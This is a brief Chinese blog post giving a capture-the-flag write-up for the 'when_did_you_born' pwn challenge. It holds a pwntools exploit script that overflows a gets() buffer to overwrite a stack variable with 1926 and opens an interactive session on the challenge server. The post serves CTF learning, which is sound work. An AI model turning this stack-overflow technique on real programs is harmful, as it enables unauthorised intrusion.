攻防世界 | when_did_you_born

 

 所以题目要求是输入生日1926

 payload:

from pwn import *
io = remote("111.198.29.45",40803)
io.recvline()
io.sendline('1234')
io.recvline()
payload = "A"*8
payload += p64(0x786)
io.sendline(payload)
io.interactive()

 

 解析:

gets存在栈溢出漏洞 ; v4:20h,v5:18h,0x20-0x18=0x8 ; 1926=0x786

 

posted @ 2019-10-30 13:30  东坡肉肉君  阅读(535)  评论(0编辑  收藏  举报